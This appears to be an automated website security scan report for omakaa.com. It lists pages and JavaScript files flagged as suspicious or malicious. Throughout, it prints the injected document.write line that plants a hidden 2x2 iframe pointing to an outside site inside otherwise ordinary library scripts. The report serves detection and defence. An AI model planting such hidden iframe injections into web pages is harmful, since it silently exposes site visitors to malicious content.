Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omakaa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://omakaa.com/ | 200 OK Content-Length: 4190 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=1449157> | ||
http://omakaa.com/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 21409 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.BrowserSniff = function() { var b = navigator.appName.toString(); var up = navigator.platform.toString(); var ua = navigator.userAgent.toString(); this.mozilla = this.ie = this.opera = this.safari = false; var re else ev.cancelBubble = true; if (ev.preventDefault) ev.preventDefault(); else ev.returnValue = false; }; Spry.Widget.MenuBar.setOptions = function(obj, optionsObj, ignoreUndefinedProps) { if (!optionsObj) return; for (var optionName in optionsObj) { if (ignoreUndefinedProps && optionsObj[optionName] == undefined) continue; obj[optionName] = optionsObj[optionName]; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var a case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/index.php | 200 OK Content-Length: 4190 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=1449157> | ||
http://omakaa.com/about/ | 200 OK Content-Length: 4337 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=1449157> | ||
http://omakaa.com/about/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var a case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/about/../SpryAssets/SpryAccordion.js | 200 OK Content-Length: 15514 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.Accordion = function(element, opts) { this.element = this.getElement(element); this.defaultPanel = 0; this.hoverClass = "AccordionPanelTabHover"; this.openClass = "AccordionPanelOpen"; this.closedC } if (this.onComplete) this.onComplete(); return; } for (i = 0; i < this.panelData.length; i++) { obj = this.panelData[i]; var ht = this.transition(elapsedTime, obj.fromHeight, obj.distance, this.duration); obj.content.style.height = ((ht < 0) ? 0 : ht) + "px"; } var self = this; this.timer = setTimeout(function() { self.stepAnimation(); }, this.interval); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/designersProfile/ | 200 OK Content-Length: 8014 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=1449157> | ||
http://omakaa.com/designersProfile/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var a case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/designersProfile/../SpryAssets/SpryAccordion.js | 200 OK Content-Length: 15514 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.Accordion = function(element, opts) { this.element = this.getElement(element); this.defaultPanel = 0; this.hoverClass = "AccordionPanelTabHover"; this.openClass = "AccordionPanelOpen"; this.closedC } if (this.onComplete) this.onComplete(); return; } for (i = 0; i < this.panelData.length; i++) { obj = this.panelData[i]; var ht = this.transition(elapsedTime, obj.fromHeight, obj.distance, this.duration); obj.content.style.height = ((ht < 0) ? 0 : ht) + "px"; } var self = this; this.timer = setTimeout(function() { self.stepAnimation(); }, this.interval); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/collection/ | 200 OK Content-Length: 5507 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=1449157> | ||
http://omakaa.com/collection/overlay.js | 200 OK Content-Length: 2691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var Overlay = new Class({ getOptions: function(){ return { colour: '#000', opacity: 0.7, zIndex: 1, container: document.body, onClick: Class.empty }; }, initialize: function(options){ this.setOptions(this.getOption this.container.setStyles({ top: myCoords.top+'px', height: myCoords.height+'px', left: myCoords.left+'px', width: myCoords.width+'px' }); } }, show: function(){ this.fade.start(0,this.options.opacity); }, hide: function(){ this.fade.start(this.options.opacity,0); } }); Overlay.implement(new Options); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/collection/multibox.js | 200 OK Content-Length: 22539 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var MultiBox = new Class({ getOptions: function(){ return { initialWidth: 250, initialHeight: 250, container: document.body, useOverlay: false, contentColor: '#FFF', showNumbers: true, showControls: true, waitDuratio this.str += '<param name="autostart" value="true" />'; this.str += '<embed src="'+this.contentObj.url+'" controls="ImageWindow" autostart="true" width="'+this.contentObj.width+'" height="'+this.contentObj.height+'"></embed>'; this.str += '<object/>'; } return obj; } }); MultiBox.implement(new Options); MultiBox.implement(new Events); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/collection/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var a case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1449157 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1449157> | ||
http://omakaa.com/coll_images/1.jpg | 200 OK Content-Length: 284436 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omakaa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 10 Jun 2014 00:57:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4190
Content-Type: text/html
...4190 bytes of data.
GET / HTTP/1.1
Host: omakaa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 10 Jun 2014 00:57:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4190
Content-Type: text/html
...4190 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: omakaa.com
Referer: http://www.google.com/search?q=omakaa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omakaa.com
Referer: http://www.google.com/search?q=omakaa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.